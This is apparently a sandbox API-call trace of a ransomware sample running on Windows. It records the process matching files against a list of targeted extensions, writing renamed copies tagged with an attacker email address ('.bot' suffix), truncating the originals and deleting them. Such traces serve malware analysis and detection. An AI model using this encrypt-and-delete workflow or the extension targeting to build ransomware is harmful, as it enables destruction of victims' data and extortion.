	[0171.582] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF") returned 63
	[0171.582] lstrlenW (lpString=".dbf") returned 4
	[0171.582] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF") returned 63
	[0171.582] lstrlenW (lpString=".1cd") returned 4
	[0171.582] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF") returned 63
	[0171.582] lstrlenW (lpString=".jpg") returned 4
	[0171.582] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.582] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.582] lstrlenW (lpString="J0186362.WMF") returned 12
	[0171.582] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186362.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0171.583] GetFileSizeEx (in: hFile=0x118, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=17662) returned 1
	[0171.583] CloseHandle (hObject=0x118) returned 1
	[0171.583] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186362.wmf")) returned 0x20
	[0171.583] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186362.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186362.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0171.583] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.583] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186362.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380
	[0171.584] GetLastError () returned 0x0
	[0171.584] ReadFile (in: hFile=0x118, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x44fe, lpOverlapped=0x0) returned 1
	[0171.586] WriteFile (in: hFile=0x380, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x4500, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x4500, lpOverlapped=0x0) returned 1
	[0171.592] ReadFile (in: hFile=0x118, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.593] WriteFile (in: hFile=0x380, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.593] SetEndOfFile (hFile=0x380) returned 1
	[0171.593] CloseHandle (hObject=0x380) returned 1
	[0171.593] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.593] SetEndOfFile (hFile=0x118) returned 1
	[0171.595] CloseHandle (hObject=0x118) returned 1
	[0171.595] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.595] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186362.wmf")) returned 1
	[0171.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF") returned 63
	[0171.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF") returned 63
	[0171.596] lstrlenW (lpString=".doc") returned 4
	[0171.596] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.596] lstrlenW (lpString=".docx") returned 5
	[0171.596] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0171.596] lstrlenW (lpString=".pdf") returned 4
	[0171.596] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.596] lstrlenW (lpString=".xls") returned 4
	[0171.596] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.596] lstrlenW (lpString=".xlsx") returned 5
	[0171.596] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0171.596] lstrlenW (lpString=".ppt") returned 4
	[0171.596] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF") returned 63
	[0171.596] lstrlenW (lpString=".zip") returned 4
	[0171.596] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.597] lstrlenW (lpString=".rar") returned 4
	[0171.597] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.597] lstrlenW (lpString=".bz2") returned 4
	[0171.597] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.597] lstrlenW (lpString=".7z") returned 3
	[0171.597] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF") returned 63
	[0171.597] lstrlenW (lpString=".dbf") returned 4
	[0171.597] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF") returned 63
	[0171.597] lstrlenW (lpString=".1cd") returned 4
	[0171.597] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF") returned 63
	[0171.597] lstrlenW (lpString=".jpg") returned 4
	[0171.597] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF") returned 63
	[0171.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF") returned 63
	[0171.597] lstrlenW (lpString=".doc") returned 4
	[0171.597] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.597] lstrlenW (lpString=".docx") returned 5
	[0171.597] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0171.597] lstrlenW (lpString=".pdf") returned 4
	[0171.597] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.597] lstrlenW (lpString=".xls") returned 4
	[0171.597] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.597] lstrlenW (lpString=".xlsx") returned 5
	[0171.597] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0171.597] lstrlenW (lpString=".ppt") returned 4
	[0171.597] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF") returned 63
	[0171.597] lstrlenW (lpString=".zip") returned 4
	[0171.597] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.598] lstrlenW (lpString=".rar") returned 4
	[0171.598] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.598] lstrlenW (lpString=".bz2") returned 4
	[0171.598] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.598] lstrlenW (lpString=".7z") returned 3
	[0171.598] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF") returned 63
	[0171.598] lstrlenW (lpString=".dbf") returned 4
	[0171.598] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF") returned 63
	[0171.598] lstrlenW (lpString=".1cd") returned 4
	[0171.598] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF") returned 63
	[0171.598] lstrlenW (lpString=".jpg") returned 4
	[0171.598] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.598] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.598] lstrlenW (lpString="J0186364.WMF") returned 12
	[0171.598] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186364.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186364.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0171.599] GetFileSizeEx (in: hFile=0x118, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=18212) returned 1
	[0171.599] CloseHandle (hObject=0x118) returned 1
	[0171.599] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186364.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186364.wmf")) returned 0x20
	[0171.599] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186364.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186364.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186364.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186364.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0171.599] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.599] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186364.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186364.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380
	[0171.712] GetLastError () returned 0x0
	[0171.712] ReadFile (in: hFile=0x118, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x4724, lpOverlapped=0x0) returned 1
	[0171.714] WriteFile (in: hFile=0x380, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x4730, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x4730, lpOverlapped=0x0) returned 1
	[0171.716] ReadFile (in: hFile=0x118, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.716] WriteFile (in: hFile=0x380, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.716] SetEndOfFile (hFile=0x380) returned 1
	[0171.716] CloseHandle (hObject=0x380) returned 1
	[0171.716] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.716] SetEndOfFile (hFile=0x118) returned 1
	[0171.718] CloseHandle (hObject=0x118) returned 1
	[0171.718] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186364.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) 

Thread:
	id = 58
	os_tid = 0x774

	[0137.422] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10000) returned 0x9fb0078
	[0137.422] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10000) returned 0x9fc0080
	[0137.423] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baea88
	[0137.423] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x6) returned 0x7bac838
	[0137.423] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baeaa0
	[0137.423] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x100000) returned 0xb180020
	[0137.423] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baeab8
	[0137.423] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7baeab8, Size=0x20) returned 0x7b65bd0
	[0137.423] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baeab8
	[0137.423] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7baeab8, Size=0x20) returned 0x7b65ba8
	[0137.423] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77080000
	[0137.424] GetProcAddress (hModule=0x77080000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x770ad650
	[0137.424] Wow64DisableWow64FsRedirection (in: OldValue=0xa68ff58 | out: OldValue=0xa68ff58*=0x0) returned 1
	[0137.424] lstrlenW (lpString="kernel32.dll") returned 12
	[0137.424] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b65bd0 | out: hHeap=0x7ab0000) returned 1
	[0137.424] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0137.424] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b65ba8 | out: hHeap=0x7ab0000) returned 1
	[0137.424] Sleep (dwMilliseconds=0x64) 
	[0137.596] Sleep (dwMilliseconds=0x64) 
	[0137.820] Sleep (dwMilliseconds=0x64) 
	[0137.995] lstrcmpiW (lpString1=".avi", lpString2=".bot") returned -1
	[0137.995] lstrlenW (lpString="boxed-delete.avi") returned 16
	[0137.995] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc
	[0138.253] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=31744) returned 1
	[0138.253] CloseHandle (hObject=0x2fc) returned 1
	[0138.254] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi")) returned 0x20
	[0138.254] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.254] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73
	[0138.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73
	[0138.254] lstrlenW (lpString=".doc") returned 4
	[0138.254] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0138.254] lstrlenW (lpString=".docx") returned 5
	[0138.254] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1
	[0138.254] lstrlenW (lpString=".pdf") returned 4
	[0138.254] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0138.255] lstrlenW (lpString=".xls") returned 4
	[0138.255] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0138.255] lstrlenW (lpString=".xlsx") returned 5
	[0138.255] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1
	[0138.255] lstrlenW (lpString=".ppt") returned 4
	[0138.255] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0138.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73
	[0138.255] lstrlenW (lpString=".zip") returned 4
	[0138.255] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0138.255] lstrlenW (lpString=".rar") returned 4
	[0138.255] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0138.255] lstrlenW (lpString=".bz2") returned 4
	[0138.255] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0138.256] lstrlenW (lpString=".7z") returned 3
	[0138.256] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0138.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73
	[0138.256] lstrlenW (lpString=".dbf") returned 4
	[0138.256] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0138.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73
	[0138.256] lstrlenW (lpString=".1cd") returned 4
	[0138.256] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0138.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73
	[0138.256] lstrlenW (lpString=".jpg") returned 4
	[0138.256] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0138.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73
	[0138.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73
	[0138.256] lstrlenW (lpString=".doc") returned 4
	[0138.256] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0138.256] lstrlenW (lpString=".docx") returned 5
	[0138.256] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1
	[0138.256] lstrlenW (lpString=".pdf") returned 4
	[0138.256] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0138.256] lstrlenW (lpString=".xls") returned 4
	[0138.256] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0138.256] lstrlenW (lpString=".xlsx") returned 5
	[0138.256] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1
	[0138.256] lstrlenW (lpString=".ppt") returned 4
	[0138.256] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0138.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73
	[0138.256] lstrlenW (lpString=".zip") returned 4
	[0138.256] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0138.256] lstrlenW (lpString=".rar") returned 4
	[0138.256] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0138.256] lstrlenW (lpString=".bz2") returned 4
	[0138.256] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0138.256] lstrlenW (lpString=".7z") returned 3
	[0138.257] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0138.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73
	[0138.257] lstrlenW (lpString=".dbf") returned 4
	[0138.257] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0138.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73
	[0138.257] lstrlenW (lpString=".1cd") returned 4
	[0138.257] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0138.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73
	[0138.257] lstrlenW (lpString=".jpg") returned 4
	[0138.257] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0138.257] lstrcmpiW (lpString1=".avi", lpString2=".bot") returned -1
	[0138.257] lstrlenW (lpString="join.avi") returned 8
	[0138.257] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc
	[0138.257] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=222208) returned 1
	[0138.257] CloseHandle (hObject=0x2fc) returned 1
	[0138.257] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi")) returned 0x20
	[0138.258] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.258] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65
	[0138.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65
	[0138.258] lstrlenW (lpString=".doc") returned 4
	[0138.258] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0138.258] lstrlenW (lpString=".docx") returned 5
	[0138.258] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1
	[0138.258] lstrlenW (lpString=".pdf") returned 4
	[0138.258] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0138.258] lstrlenW (lpString=".xls") returned 4
	[0138.258] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0138.258] lstrlenW (lpString=".xlsx") returned 5
	[0138.258] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1
	[0138.258] lstrlenW (lpString=".ppt") returned 4
	[0138.258] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0138.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65
	[0138.258] lstrlenW (lpString=".zip") returned 4
	[0138.258] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0138.258] lstrlenW (lpString=".rar") returned 4
	[0138.258] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0138.258] lstrlenW (lpString=".bz2") returned 4
	[0138.258] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0138.258] lstrlenW (lpString=".7z") returned 3
	[0138.258] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0138.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65
	[0138.258] lstrlenW (lpString=".dbf") returned 4
	[0138.258] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0138.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65
	[0138.258] lstrlenW (lpString=".1cd") returned 4
	[0138.258] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0138.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65
	[0138.259] lstrlenW (lpString=".jpg") returned 4
	[0138.259] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0138.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65
	[0138.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65
	[0138.259] lstrlenW (lpString=".doc") returned 4
	[0138.259] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0138.259] lstrlenW (lpString=".docx") returned 5
	[0138.259] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1
	[0138.259] lstrlenW (lpString=".pdf") returned 4
	[0138.259] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0138.259] lstrlenW (lpString=".xls") returned 4
	[0138.259] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0138.259] lstrlenW (lpString=".xlsx") returned 5
	[0138.259] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1
	[0138.259] lstrlenW (lpString=".ppt") returned 4
	[0138.259] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0138.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65
	[0138.259] lstrlenW (lpString=".zip") returned 4
	[0138.259] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0138.259] lstrlenW (lpString=".rar") returned 4
	[0138.259] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0138.259] lstrlenW (lpString=".bz2") returned 4
	[0138.259] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0138.259] lstrlenW (lpString=".7z") returned 3
